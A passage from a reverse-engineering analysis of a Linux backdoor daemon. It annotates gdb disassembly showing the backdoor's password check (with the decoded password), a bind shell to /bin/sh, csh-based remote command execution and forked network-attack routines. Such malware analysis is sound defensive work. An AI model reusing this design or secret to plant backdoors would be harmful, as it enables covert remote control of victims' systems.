0x8048984 for the next accept() call.
If we are the child:
0x80489b8: pushl $0x0
0x80489ba: pushl $0x13
0x80489bc: leal 0xffffbc44(%ebp),%eax
0x80489c2: pushl %eax
0x80489c3: movl 0xffffbb34(%ebp),%ecx
0x80489c9: pushl %ecx
0x80489ca: call 0x8056b44
0x8056b44 has already been identified as a recv() call. As such,
in trying to identify 0xffffbb34(%ebp) (which should be a socket),
we look back to just after the accept() call:
0x804899e: movl %eax,0xffffbb34(%ebp)
As is fairly obvious, the recv() is done upon the accept()'d socket.
0xffffbc44(%ebp) would be some buffer which does not seem to be used
anywhere prior.
The 0x13 indicates a read of at most 19 bytes.
Starting at 0x80489cf, something peculiar occurs. Starting at
0xffffbc44(%ebp), we look one byte at a time. If the byte matches a
0xa or a 0xd ('\n' or '\r'), we replace it with a 0. This is a
simple string termination. The strange bit occurs if the character
is NOT one of these two characters:
0x80489f7: incb 0xffffbc44(%ebx,%ebp,1)
The byte in the buffer is incremented by 1. The loop continues for
all 0x13 bytes. When this is done, we start on what looks to be a
byte for byte compare process:
0x8048a04: leal 0xffffbc44(%ebp),%esi
0x8048a0a: movl $0x8067617,%edi
0x8048a0f: movl $0x6,%ecx
0x8048a14: cld
0x8048a15: testb $0x0,%al
0x8048a17: repz cmpsb %ds:(%esi),%es:(%edi)
0x8048a19: je 0x8048a44
%esi and %edi are obviously the buffer starting points. %esi is
loaded with the buffer (that just experienced a byte-by-byte
increment). %edi:
(gdb) x/1s 0x8067617
0x8067617: "TfOjG"
%ecx is loaded with 6. This is the number of bytes that will be
compared under the repz. Coincidentally, the string at 0x8067617 is
also 6 bytes long once the terminating NUL is counted
(hrmm....interesting).
Balancing the equation, since we were incrementing our input and
then comparing to "TfOjG", we can decrement the "TfOjG" characters
by 1 to find out just what input this connection is expecting.
Doing so shows the expected input to be "SeNiF". Still makes no
sense, perhaps it means something in another language.
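Both directions of this can be checked quickly. The sketch below models
the per-byte loop as described (all 0x13 bytes are processed, with '\n'
and '\r' becoming 0 and everything else being incremented) and derives
the expected input from the stored string. Bytes beyond what was
received are modelled as zeros, which is an assumption. In the real
process they would be whatever was on the stack. The function name is
mine.

```python
def transform(received: bytes) -> bytes:
    """Apply the per-byte loop at 0x80489cf to a 0x13 byte receive buffer."""
    buf = bytearray(received.ljust(0x13, b"\x00")[:0x13])
    for i in range(0x13):
        if buf[i] in (0x0A, 0x0D):
            buf[i] = 0                      # terminate the string at '\n' or '\r'
        else:
            buf[i] = (buf[i] + 1) & 0xFF    # incb wraps at 8 bits
    return bytes(buf)


STORED = b"TfOjG\x00"                       # 5 characters plus the terminating NUL
expected_input = bytes(c - 1 for c in b"TfOjG")
print(expected_input, transform(expected_input + b"\n")[:6] == STORED)
```

The newline at the end of the input matters: it becomes the 0 that
matches the sixth compared byte.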
If the comparison fails:
0x8048a1b: pushl $0x0
0x8048a1d: pushl $0x4
0x8048a1f: pushl $0x806761d
0x8048a24: movl 0xffffbb34(%ebp),%edx
0x8048a2a: pushl %edx
0x8048a2b: call 0x8056bf0
0x8056bf0 is unidentified, so:
0x8056c0f: movl $0x9,%edx
0x8056c17: movl $0x66,%eax
0x8056c1c: movl %edx,%ebx
0x8056c1e: int $0x80
This is all the function seems to do system-wise. The above
corresponds to a SYS_SEND socketcall. Looking at the values, once
again, we see the accept()'d socket, the value of 0x806761d, and 4.
4 is the number of bytes to be sent, so 0x806761d should be the
buffer to send out:
(gdb) x/4b 0x806761d
0x806761d: 0xff 0xfb 0x01 0x00
Strange bytes which do not seem to correspond to anything. The
buffer at 0x806761d appears unused prior to this, so hopefully the
contents of this buffer will become clearer later.
Keeping in line with the fail-end of the byte comparison earlier:
0x8048a30: movl 0xffffbb34(%ebp),%ecx
0x8048a36: pushl %ecx
0x8048a37: call 0x8057160
0x8048a3c: pushl $0x1
0x8048a3e: call 0x8055fbc
After the send(), it looks like we call a close() on the accept()'d
socket, followed by an exit().
The interesting things occur if the byte comparison succeeds:
0x8048a44: pushl $0x0
0x8048a46: movl 0xffffbb34(%ebp),%edx
0x8048a4c: pushl %edx
0x8048a4d: call 0x805718c
Yet again, this function is unknown:
0x8057190: movl $0x3f,%eax
0x805719b: int $0x80
Now it can be identified however, as a dup2(). The parameters
indicate the accept()'d socket is dup2()'d as stdin. The same setup
and call is done for 1 and 2, so that when they have finished,
stdin, stdout, and stderr are all dup2()'d to the accept()'d socket.
Following this:
0x8048a6e: pushl $0x1
0x8048a70: pushl $0x8067621
0x8048a75: pushl $0x8067651
0x8048a7a: call 0x804a2a8
Another function that needs identifying, so:
0x804a2a8 calls:
0x805652c:
Does nothing of interest.
0x805bd74:
Calls 0x805ba88
Calls 0x8065cec
0x8065d1c: movl $0x5a,%eax
0x8065d23: int $0x80
Identified as an mmap()
Calls 0x805bbf4
Calls variable
0x805c290:
Calls 0x805bb34
Calls 0x8066154
0x8066158: movl $0x5b,%eax
0x8066163: int $0x80
Identified as munmap()
Calls 0x8056e64
Does nothing of Interest
Calls 0x805c944
Calls variable
So, after all that, we're left none the wiser. Hopefully the stack
will help in identification. Three values are pushed: 0x1,
0x8067621, 0x8067651. This would look like:
function(0x8067651, 0x8067621, 0x1)
Parameters:
(gdb) x/1s 0x8067621
0x8067621: "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:."
(gdb) x/1s 0x8067651
0x8067651: "PATH"
I think this gives it away as most probably a setenv(). As such it
will be assumed as setenv() for the rest of the analysis.
Continuing:
0x8048a7f: addl $0x24,%esp
0x8048a82: pushl $0x8067656
0x8048a87: call 0x804a48c
0x804a48c is also an unknown function. We'll look at the parameter
first this time (probably easier):
(gdb) x/1s 0x8067656
0x8067656: "HISTFILE"
While the function probably should be analysed from an assembly
viewpoint, it would probably turn out to be an unsetenv(). This may
need to be reviewed later to ensure nothing tricky is done, but at
this point in time, 0x804a48c is going to be assumed as unsetenv().
Continuing:
0x8048a8c: pushl $0x1
0x8048a8e: pushl $0x806765f
0x8048a93: pushl $0x8067665
0x8048a98: call 0x804a2a8
Finally, a recognisable function, one believed to be setenv(). A
quick look at the parameters:
(gdb) x/1s 0x8067665
0x8067665: "TERM"
(gdb) x/1s 0x806765f
0x806765f: "linux"
An obvious setting of terminal type to "linux". It should be noted
both this setenv() and the previous included a 1 on the stack. This
simply indicates that if an environment variable already existed, it
would be overwritten.
Continuing:
0x8048a9d: pushl $0x0
0x8048a9f: pushl $0x806766a
0x8048aa4: pushl $0x806766d
0x8048aa9: call 0x80555fc
This function is unknown, so we'll look at the parameters first:
(gdb) x/1s 0x806766d
0x806766d: "/bin/sh"
(gdb) x/1s 0x806766a
0x806766a: "sh"
Most certainly doesn't take a genius to guess what this function is,
however, we'll try to prove it anyway:
Calls 0x80571b8:
0x80571bc: movl $0xb,%eax
0x80571ca: int $0x80
This corresponds to a __NR_execve call.
It must be an execl() call due to the parameters.
There appears to be further code for a close() and exit() after the
execl() call, but theoretically these wouldn't normally be called?
0x08048acc:
First up:
0x8048acc: call 0x80571e8
0x8048ad1: movl %eax,0x807e770
0x8048ad6: testl %eax,%eax
0x8048ad8: jne 0x8048eb8
Translates into a fork whereby the parent ends up with PID_Var_A
being set to the PID of the child process, and then jumps back to
the main recv() loop.
The child continues on however:
0x8048ade: call 0x805733c
0x8048ae3: pushl $0x1
0x8048ae5: pushl $0x11
0x8048ae7: call 0x80569bc
These same lines have been seen before. They simply are setsid()
followed by a signal(SIGCHLD, SIG_IGN).
Following the setup, as expected, a fork occurs:
0x8048aec: call 0x80571e8
0x8048af1: addl $0x8,%esp
0x8048af4: testl %eax,%eax
0x8048af6: je 0x8048b18
The child process jumps off to 0x8048b18, while the parent
continues:
0x8048af8: pushl $0x4b0
0x8048afd: call 0x80556cc
0x8048b02: pushl $0x9
0x8048b04: movl 0x807e770,%eax
0x8048b09: pushl %eax
0x8048b0a: call 0x80572b0
0x8048b0f: pushl $0x0
0x8048b11: call 0x8055fbc
The first call would correspond to a sleep(0x4b0). The second is a
kill(), whereby the PID to be killed is the value at 0x807e770.
This has been deemed to be PID_Var_A, but will have been set to 0
as a result of the fork() earlier. The outcome of a kill(0, 9) was
examined earlier in the case section for 0x08048590. It appears to
have an identical purpose in this instance. That is, it will see to
it that this case section will only exist for a maximum time of 1200
seconds. Following the kill, an exit() is called, thus ending this
section.
The child process of the fork at 0x8048aec will now be examined:
0x8048b1c: movb 0xfffff002(%ebx,%ebp,1),%al
0x8048b23: movb %al,0xfffff000(%ebx,%ebp,1)
0x8048b2a: incl %ebx
0x8048b2b: cmpl $0x18d,%ebx
0x8048b31: jle 0x8048b1c
The above is a loop that will repeat 0x18e times (%ebx runs from 0
through 0x18d). The purpose of it appears to be to shift the
contents of the buffer at 0xfffff000 left by 2 bytes. This buffer
is the one believed to be a decoded version of 0xfffff800.
Keeping in similarity with what we saw in a previous case section:
0x8048b33: movl 0xffffbb20(%ebp),%edx
0x8048b39: pushl %edx
0x8048b3a: pushl $0x8067675
0x8048b3f: leal 0xfffff800(%ebp),%ebx
0x8048b45: pushl %ebx
0x8048b46: call 0x804f808
The 0x804f808 call is currently assumed to be a sprintf(). In
looking at the parameters passed to it:
function(0xfffff800(%ebp), 0x8067675, *0xffffbb20(%ebp))
0xfffff800(%ebp) would be the destination buffer, 0x8067675 should
be the format string, and *0xffffbb20(%ebp) should be the address
of the corresponding input according to the format string.
(gdb) x/1s 0x8067675
0x8067675: "/bin/csh -f -c \"%s\" "
Indeed, the format string holds true, the buffer starting
0xfffff800(%ebp) is the same one used to initially store the
recv()'d buffer, and *0xffffbb20(%ebp) points to the buffer that was
just shifted (0xfffff000(%ebp)).
It should appear fairly obvious at this point that 0xfffff000(%ebp)
would contain some command and is more than likely some derived
command from the recv()'d packet's data.
As expected, and as seen earlier:
0x8048b4b: pushl %ebx
0x8048b4c: call 0x80557e8
0x8048b51: pushl $0x0
0x8048b53: call 0x8057554
The first call corresponds to a system() call using the string just
constructed. Following this, _exit() is called, thus ending this
case section.
It should be noted that if the system() command takes more than 1200
seconds, this case section will effectively be kill()'ed, along with
any command that was running.
0x08048b58:
This section is very short, but seems to be very important to this
binary:
0x8048b58: movl 0x807e774,%eax
0x8048b5d: testl %eax,%eax
0x8048b5f: je 0x8048eb8
0x8048b65: pushl $0x9
0x8048b67: pushl %eax
0x8048b68: call 0x80572b0
0x8048b6d: movl $0x0,0x807e774
0x8048b77: addl $0x8,%esp
0x8048b7a: jmp 0x8048eb8
PID_Var_B is the basis of this case section. If PID_Var_B is
non-zero, it will be used in a kill statement, using PID_Var_B as
the PID to be killed. Currently there have been three case sections
that use PID_Var_B. It seems to be used in a way so that only one
of these case sections can be running at any one time. While any
one of these is running, PID_Var_B will contain its PID. This
case section appears to be a way of stopping any other running case
section (minus the first two which possibly do not have ongoing
processes, or ones such as the system() sections which contain their
own kill() code).
If PID_Var_B is zero (indicating no other ongoing case section is
running), execution will immediately jump back to the main recv()
loop. If PID_Var_B is nonzero, indicating another case section is
running, the PID indicated by PID_Var_B will be killed and execution
will be returned back to the main recv() loop.
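The bookkeeping around PID_Var_B amounts to a very small state machine.
The toy model below shows just that logic. No processes are created or
killed, the PIDs are made up, and the class and method names are mine.
Global_C is left alone by stop() because the disassembly of this
section only clears 0x807e774.

```python
class Dispatcher:
    """Toy model of the PID_Var_B bookkeeping; no processes are created."""

    def __init__(self):
        self.pid_var_b = 0
        self.global_c = 0
        self._next_pid = 1000          # made-up PIDs standing in for fork() results
        self.killed = []

    def start(self, case_number):
        """A forking case section: only runs when nothing is recorded as running."""
        if self.pid_var_b != 0:
            return False               # jne 0x8048eb8: back to the recv() loop
        self.global_c = case_number
        self._next_pid += 1
        self.pid_var_b = self._next_pid
        return True

    def stop(self):
        """The section at 0x08048b58: kill(PID_Var_B, 9), then clear the variable."""
        if self.pid_var_b == 0:
            return False
        self.killed.append(self.pid_var_b)
        self.pid_var_b = 0
        return True


d = Dispatcher()
results = (d.start(4), d.start(5), d.stop(), d.start(5))
print(results, d.global_c, d.killed)
```

A second start request is refused while the first is recorded as
running, and is accepted again once the stop section has cleared the
variable.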
0x08048b80:
As with other case sections:
0x8048b80: cmpl $0x0,0x807e774
0x8048b87: jne 0x8048eb8
We check PID_Var_B and if it is zero (certain other sections are not
running) we continue, if not we simply return to the main recv()
loop.
Once again, we see the following similar code:
0x8048b8d: movl $0x9,0x807e778
0x8048b97: call 0x80571e8
0x8048b9c: movl %eax,0x807e774
0x8048ba1: testl %eax,%eax
0x8048ba3: jne 0x8048eb8
We set Global_C to 9 (this is the 9th case section strangely
enough...). 0x80571e8 matches up to a fork() call, with the parent
process having the PID of the child stored once again into
PID_Var_B. The parent process then continues by jumping back to the
main recv() loop.
The child then does a buffer copy:
0x8048ba9: leal 0xffffbb44(%ebp),%edi
0x8048baf: leal 0xfffff000(%ebp),%esi
0x8048bb5: cld
0x8048bb6: movl $0x3f,%ecx
0x8048bbb: repz movsl %ds:(%esi),%es:(%edi)
0x8048bbd: movsw %ds:(%esi),%es:(%edi)
0x8048bbf: movsb %ds:(%esi),%es:(%edi)
Strange method of copy, but easy to see nonetheless. This code is
identical to code seen in some earlier case sections. It seems to
copy 255 bytes of data from the buffer sent to
Data_Manipulation_Function_A into Buffer_B.
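The 255 byte figure follows directly from the three string instructions. A quick arithmetic check (variable names are illustrative only):

```python
LONGS = 0x3f                   # %ecx loaded before "repz movsl"
copied = LONGS * 4 + 2 + 1     # 63 x movsl (4 bytes), one movsw (2), one movsb (1)
print(copied)                  # 255
```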
Following this, we start another loop:
0x8048bc4: movb 0xffffbb4e(%ebx,%ebp,1),%al
0x8048bcb: movb %al,0xffffbb44(%ebx,%ebp,1)
0x8048bd2: incl %ebx
0x8048bd3: cmpl $0xfe,%ebx
0x8048bd9: jle 0x8048bc4
This loop has the effect of shifting the buffer starting at
0xffffbb44 (Buffer_B) left by 10 bytes.
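The effect of this loop can be modelled as below. This is a sketch under two assumptions that the listing above does not show: that %ebx starts at 0, and that Buffer_B is large enough for the reads at index + 10 to stay inside it (the padding in the example stands in for that).

```python
def shift_left(buf, shift):
    """Mimic the loop at 0x8048bc4: buf[i] = buf[i + shift] for i = 0..0xfe."""
    for i in range(0xff):              # %ebx runs from 0 to 0xfe inclusive
        buf[i] = buf[i + shift]
    return buf


# 255 recognisable bytes followed by zero padding (assumed extra room)
buffer_b = bytearray(range(255)) + bytearray(16)
shift_left(buffer_b, 10)
print(buffer_b[0], buffer_b[244], buffer_b[245])
```

After the call, the byte that was at offset 10 sits at offset 0, and the tail of the 255 byte window is filled from whatever followed it.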
The long stack setup for another call then starts:
0x8048bdb: leal 0xffffbb44(%ebp),%eax
0x8048be1: pushl %eax
0x8048be2: movzbl 0xfffff009(%ebp),%eax
0x8048be9: pushl %eax
0x8048bea: movzbl 0xfffff008(%ebp),%eax
0x8048bf1: pushl %eax
0x8048bf2: movzbl 0xfffff007(%ebp),%eax
0x8048bf9: pushl %eax
0x8048bfa: movzbl 0xfffff006(%ebp),%eax
0x8048c01: pushl %eax
0x8048c02: movzbl 0xfffff005(%ebp),%eax
0x8048c09: pushl %eax
0x8048c0a: movzbl 0xfffff004(%ebp),%eax
0x8048c11: pushl %eax
0x8048c12: movzbl 0xfffff003(%ebp),%eax
0x8048c19: pushl %eax
0x8048c1a: movzbl 0xfffff002(%ebp),%eax
0x8048c21: pushl %eax
0x8048c22: call 0x8049174
This all corresponds to:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
*0xfffff008(%ebp), *0xfffff009(%ebp), Buffer_B)
The function at 0x8049174 contains calls to the socket() function
among others. A quick look at the function addressing list shows
this function was called in an earlier case section, and has already
been named Network_Function_B. It will be analysed in depth later.
In keeping with other function termination:
0x8048c2a: pushl $0x0
0x8048c2c: call 0x8057554
A call of _exit(0) completes this child process's life.
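Putting the copy, the shift and the stack setup together, the child appears to split the decoded buffer as sketched below. The function name split_case9 is invented for illustration, and the meaning of the individual argument bytes is not known at this point in the analysis.

```python
def split_case9(decoded):
    """Split a decoded buffer the way the case section at 0x8048b80 appears to."""
    args = list(decoded[2:10])      # 0xfffff002(%ebp) .. 0xfffff009(%ebp), zero-extended
    payload = bytes(decoded[10:])   # what Buffer_B holds after the 10 byte shift
    return args, payload


decoded = bytes([0, 0, 1, 2, 3, 4, 5, 6, 7, 8]) + b"example"
args, payload = split_case9(decoded)
print(args, payload)
```

The eight values in args correspond, in order, to the first eight parameters of the call to 0x8049174, with payload standing in for Buffer_B.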
0x08048c34:
This section's analysis looks like it could almost be cp/pasted from
the previous one. It starts off the same:
0x8048c34: cmpl $0x0,0x807e774
0x8048c3b: jne 0x8048eb8
0x8048c41: movl $0xa,0x807e778
0x8048c4b: call 0x80571e8
0x8048c50: movl %eax,0x807e774
0x8048c55: testl %eax,%eax
0x8048c57: jne 0x8048eb8
The normal check of PID_Var_B, followed by the setting of Global_C.
Then along comes the fork() code with the PID being stored into
PID_Var_B and the parent then returning back to the main recv()
code, leaving the child to undertake the rest of the section:
0x8048c5d: leal 0xffffbb44(%ebp),%edi
0x8048c63: leal 0xfffff000(%ebp),%esi
0x8048c69: cld
0x8048c6a: movl $0x3f,%ecx
0x8048c6f: repz movsl %ds:(%esi),%es:(%edi)
0x8048c71: movsw %ds:(%esi),%es:(%edi)
0x8048c73: movsb %ds:(%esi),%es:(%edi)
The same 255 byte copy from 0xfffff000 to Buffer_B, followed by the
same byte shift code:
0x8048c78: movb 0xffffbb52(%ebx,%ebp,1),%al
0x8048c7f: movb %al,0xffffbb44(%ebx,%ebp,1)
0x8048c86: incl %ebx
0x8048c87: cmpl $0xfe,%ebx
0x8048c8d: jle 0x8048c78
In this case, shifting Buffer_B's data to the left by 14 bytes. And
in keeping with similarity, we then commence with the stack setup
for some function:
0x8048c8f: leal 0xffffbb44(%ebp),%eax
0x8048c95: pushl %eax
0x8048c96: movzbl 0xfffff00d(%ebp),%eax
0x8048c9d: pushl %eax
0x8048c9e: pushl $0x0
0x8048ca0: movzbl 0xfffff00c(%ebp),%eax
0x8048ca7: pushl %eax
0x8048ca8: movzbl 0xfffff00b(%ebp),%eax
0x8048caf: pushl %eax
0x8048cb0: movzbl 0xfffff00a(%ebp),%eax
0x8048cb7: pushl %eax
0x8048cb8: movzbl 0xfffff009(%ebp),%eax
0x8048cbf: pushl %eax
0x8048cc0: movzbl 0xfffff008(%ebp),%eax
0x8048cc7: pushl %eax
0x8048cc8: movzbl 0xfffff007(%ebp),%eax
0x8048ccf: pushl %eax
0x8048cd0: movzbl 0xfffff006(%ebp),%eax
0x8048cd7: pushl %eax
0x8048cd8: movzbl 0xfffff005(%ebp),%eax
0x8048cdf: pushl %eax
0x8048ce0: movzbl 0xfffff004(%ebp),%eax
0x8048ce7: pushl %eax
0x8048ce8: movzbl 0xfffff003(%ebp),%eax
0x8048cef: pushl %eax
0x8048cf0: movzbl 0xfffff002(%ebp),%eax
0x8048cf7: pushl %eax
0x8048cf8: call 0x8049d40
Putting the code into C format:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
*0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp),
*0xfffff00b(%ebp), *0xfffff00c(%ebp), 0,
*0xfffff00d(%ebp), 0xffffbb44(%ebp))
The call at 0x8049d40 is unknown, contains network calls to socket()
and others, and as such has been named Network_Function_D for later
analysis.
As expected, the child process then ends with an _exit() call.
0x08048d08:
Yet again we are left with almost identical code to the previous
case section. In an attempt to not write unnecessary things, only
the differences will be noted:
0x8048d15: movl $0xb,0x807e778
Global_C is set to 11 (as expected).
The byte shift for Buffer_B is 15 bytes for this case section.
Function setup looks like this:
0x8048d63: leal 0xffffbb44(%ebp),%eax
0x8048d69: pushl %eax
0x8048d6a: movzbl 0xfffff00e(%ebp),%eax
0x8048d71: pushl %eax
0x8048d72: movzbl 0xfffff00d(%ebp),%eax
0x8048d79: pushl %eax
0x8048d7a: movzbl 0xfffff00c(%ebp),%eax
0x8048d81: pushl %eax
0x8048d82: movzbl 0xfffff00b(%ebp),%eax
0x8048d89: pushl %eax
0x8048d8a: movzbl 0xfffff00a(%ebp),%eax
0x8048d91: pushl %eax
0x8048d92: movzbl 0xfffff009(%ebp),%eax
0x8048d99: pushl %eax
0x8048d9a: movzbl 0xfffff008(%ebp),%eax
0x8048da1: pushl %eax
0x8048da2: movzbl 0xfffff007(%ebp),%eax
0x8048da9: pushl %eax
0x8048daa: movzbl 0xfffff006(%ebp),%eax
0x8048db1: pushl %eax
0x8048db2: movzbl 0xfffff005(%ebp),%eax
0x8048db9: pushl %eax
0x8048dba: movzbl 0xfffff004(%ebp),%eax
0x8048dc1: pushl %eax
0x8048dc2: movzbl 0xfffff003(%ebp),%eax
0x8048dc9: pushl %eax
0x8048dca: movzbl 0xfffff002(%ebp),%eax
0x8048dd1: pushl %eax
0x8048dd2: call 0x8049d40
Putting this into C format:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
*0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp),
*0xfffff00b(%ebp), *0xfffff00c(%ebp), *0xfffff00d(%ebp),
*0xfffff00e(%ebp), 0xffffbb44(%ebp))
The call is to the same function as in the previous case section,
and is named Network_Function_D. There only appears to be one
difference in the call, and that has to do with the 12th argument
which before was a 0, and in this case is probably set by the
blackhat manually.
Upon function conclusion the child process will _exit(0) as usual.
0x08048de4:
Yet again, we end up with very similar code. Again, only the
differences will be noted:
0x8048df1: movl $0xc,0x807e778
Global_C is set to 12 (as expected).
The byte shift for Buffer_B is 14 bytes for this case section.
Function setup looks like this:
0x8048e3f: leal 0xffffbb44(%ebp),%eax
0x8048e45: pushl %eax
0x8048e46: movzbl 0xfffff00d(%ebp),%eax
0x8048e4d: pushl %eax
0x8048e4e: movzbl 0xfffff00c(%ebp),%eax
0x8048e55: pushl %eax
0x8048e56: movzbl 0xfffff00b(%ebp),%eax
0x8048e5d: pushl %eax
0x8048e5e: movzbl 0xfffff00a(%ebp),%eax
0x8048e65: pushl %eax
0x8048e66: movzbl 0xfffff009(%ebp),%eax
0x8048e6d: pushl %eax
0x8048e6e: movzbl 0xfffff008(%ebp),%eax
0x8048e75: pushl %eax
0x8048e76: movzbl 0xfffff007(%ebp),%eax
0x8048e7d: pushl %eax
0x8048e7e: movzbl 0xfffff006(%ebp),%eax
0x8048e85: pushl %eax
0x8048e86: movzbl 0xfffff005(%ebp),%eax
0x8048e8d: pushl %eax
0x8048e8e: movzbl 0xfffff004(%ebp),%eax
0x8048e95: pushl %eax
0x8048e96: movzbl 0xfffff003(%ebp),%eax
0x8048e9d: pushl %eax
0x8048e9e: movzbl 0xfffff002(%ebp),%eax
0x8048ea5: pushl %eax
0x8048ea6: call 0x8049564
C Format:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
*0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp),
*0xfffff00b(%ebp), *0xfffff00c(%ebp), *0xfffff00d(%ebp),
0xffffbb44(%ebp))
The function call to 0x8049564 seems to be new, contains network
function calls, and as such will be named Network_Function_E.
The child process would then terminate with a call to _exit().
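The last four case sections differ only in the value written to Global_C, the size of the Buffer_B shift, and the function called. The table below restates those values from the listings above. The helper argument_bytes is an illustration of one pattern that holds in all four: the single-byte arguments start at offset 2 of the decoded buffer and end exactly where the shifted payload begins.

```python
# Global_C value -> (Buffer_B shift in bytes, callee address, name used in this analysis)
CASE_SECTIONS = {
    9:  (10, 0x8049174, "Network_Function_B"),
    10: (14, 0x8049d40, "Network_Function_D"),
    11: (15, 0x8049d40, "Network_Function_D"),
    12: (14, 0x8049564, "Network_Function_E"),
}


def argument_bytes(case):
    """Number of single-byte arguments taken from the decoded buffer."""
    shift, _, _ = CASE_SECTIONS[case]
    return shift - 2   # arguments occupy offsets 2 .. shift - 1


for case in sorted(CASE_SECTIONS):
    print(case, argument_bytes(case), CASE_SECTIONS[case][2])
```

Note that the section setting Global_C to 10 additionally pushes a literal 0, so its call has one more parameter than the byte count suggests.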
This concludes the case sections, and as such, the core functionality
of the binary. The program has now been shown to have the following on
demand from the blackhat:
* Ability to execute given commands using csh.
* The ability to potentially show the response from executing such
a command to the blackhat.
* Ability to automatically terminate the execution of those commands
after a certain period of time.
* The ability to execute various functions, one at a time.
* The ability to terminate those functions.
The first two case statements are extremely interesting, and would have
to be of some importance, however their secrets are not yet known. As
the binary stands, the core functionality of it appears solid, and built
in a modular way such that any function that is called is immediately
forked off (and secure from crashing the rest of the daemon).
An analysis of the traffic expected by the binary will be completed in
Network_Analysis_A.
vi) Function Addressing:
Address    Function                      Purpose
0x805720c  geteuid()                     Standard
0x8055fbc  exit()*                       Standard
0x8057764  memset()*                     Standard
0x80569bc  signal()                      Standard
0x80571e8  fork()                        Standard
0x805733c  setsid()*                     Standard
0x8057134  chdir()                       Standard
0x8057160  close()                       Standard
0x8057444  time()                        Standard
0x80559a0  srandom()**                   Standard
0x8056cf4  socket()                      Standard
0x8056b44  recv()                        Standard
0x80555b0  usleep()*                     Standard
0x804a1e8  Data_Manipulation_Function_A  Memory Manipulation
0x804a194  Data_Manipulation_Function_B  Memory Manipulation
0x8048ecc  Network_Function_A            Network
0x8049174  Network_Function_B            Network
0x80499f4  Network_Function_C            Network
0x8049d40  Network_Function_D            Network
0x8049564  Network_Function_E            Network
0x8048f94  Network_Function_F            Network
0x8056058  random()**                    Standard (Or a wrapper)
0x8055e38  random()**                    Standard
0x80556cc  sleep()*                      Standard
0x80572b0  kill()                        Standard
0x80557e8  system()**                    Standard
0x804f808  sprintf()**                   Standard
0x804f620  fopen()*                      Standard
0x804f6d4  fread()**                     Standard
0x804f540  fclose()**                    Standard
0x8057554  _exit()                       Standard
0x8056c9c  setsockopt()                  Standard
0x8056a74  bind()                        Standard
0x8056b04  listen()                      Standard
0x8056a2c  accept()                      Standard
0x8056bf0  send()                        Standard
0x805718c  dup2()                        Standard
0x804a2a8  setenv()*                     Standard
0x804a48c  unsetenv()**                  Standard
0x80555fc  execl()                       Standard
0x804bf80  gethostbyname()*              Standard
0x8056480  Misc_Data_Copy()              Standard (Assumed)
0x8056c3c  sendto()                      Standard
0x804ce8c  inet_addr()                   Standard
0x804ceb4  inet_aton()                   Standard
* = Unconfirmed but strongly suspected
** = Guess based upon positioning of call
vii) Variable Addressing:
0x807e77c Global_A
0x807e784 Global_B
0x807e778 Global_C
0xffffee48(%ebp) Buffer_A (code starting at 0x8048134)
0xffffbb44(%ebp) Buffer_B (code starting at 0x8048134)
0x807e770 PID_Var_A
0x807e774 PID_Var_B
viii) Function Analysis
This section will look at the functions that were detected to be of
significance in the prior analysis.
a) Data_Manipulation_Function_A [0x804a1e8] - (Memory Manipulation)
Known Usage:
function(AmountOfDataReceived-22, IP_Packet_Data, SomeBuffer)
Guesses at purpose:
From the position in which this function is used, it is assumed to be
some sort of decoder for translating packet data sent over the
communication channel between the blackhat and this binary. It should
be noted that this function would be very deliberate, and the code
about to be analysed could very well be a public encryption method.
It is also quite possible that this function does not follow the usual
compiler-generated assembly patterns, since it may well have been
written directly in assembly.
Naming Conventions:
Parameters will be given the following names:
function(DataAmount, Data_In, Data_Out)
Disassembly:
The code starts off strangely for a C function. The initial stack
allocations are quite strange:
0x804a1f1: movl 0x8(%ebp),%edi
0x804a1f4: leal 0xffffffff(%edi),%ebx
0x804a1f7: leal 0x3(%edi),%eax
0x804a1fa: andb $0xfc,%al
0x804a1fc: subl %eax,%esp
The long at 0x8(%ebp) would be the "DataAmount" (given the %ebp push and
the sub at 0x804a1eb). It's assumed this is the amount of data that the
function will have to decode. The code above reserves stack space in
proportion to DataAmount: 3 is added and the andb then clears the low
two bits, which rounds DataAmount up to the next multiple of 4 and so
keeps the allocation 4 byte aligned.
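The size of the reservation can be worked through numerically. The sketch below mirrors the three instructions involved. Note that andb only touches the low byte of %eax, which is modelled explicitly here; the function name is illustrative.

```python
def stack_reservation(data_amount):
    """leal 0x3(%edi),%eax ; andb $0xfc,%al ; subl %eax,%esp"""
    eax = (data_amount + 3) & 0xFFFFFFFF
    eax = (eax & 0xFFFFFF00) | (eax & 0xFC)   # andb $0xfc only changes %al
    return eax


for n in (1, 4, 5, 22, 255):
    print(n, stack_reservation(n))
```

Each result is the input rounded up to a multiple of 4, which is why the local buffer is always at least DataAmount bytes long.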
Something else strange:
0x804a201: movb 0x80675e5,%al
0x804a207: movl 0x10(%ebp),%esi
0x804a20a: movb %al,(%esi)
(gdb) x/1b 0x80675e5
0x80675e5: 0x00
Three instructions to simply NULL the first byte of Data_Out
(remembering the parameters start from 0x8(%ebp)).
Starting at 0x804a20c is what looks to be some kind of looping structure
with %ebx as a counter. %ebx is first set up here:
0x804a1f1: movl 0x8(%ebp),%edi
0x804a1f4: leal 0xffffffff(%edi),%ebx
This corresponds to %ebx starting at DataAmount - 1.
The looping structure seems to start here:
0x804a20c: testl %ebx,%ebx
0x804a20e: jl 0x804a29b
Indicating the loop will continue until %ebx reaches a state of < 0.
0x804a214: leal 0xffffffff(%ebx),%edx
0x804a217: testl %ebx,%ebx
0x804a219: je 0x804a22c
%edx is set to %ebx - 1.
%ebx is checked:
if it does NOT equal 0 then:
0x804a21b: movl 0xc(%ebp),%esi
0x804a21e: movzbl (%ebx,%esi,1),%eax
0x804a222: movzbl (%edx,%esi,1),%edx
0x804a226: subl %edx,%eax
0x804a228: jmp 0x804a232
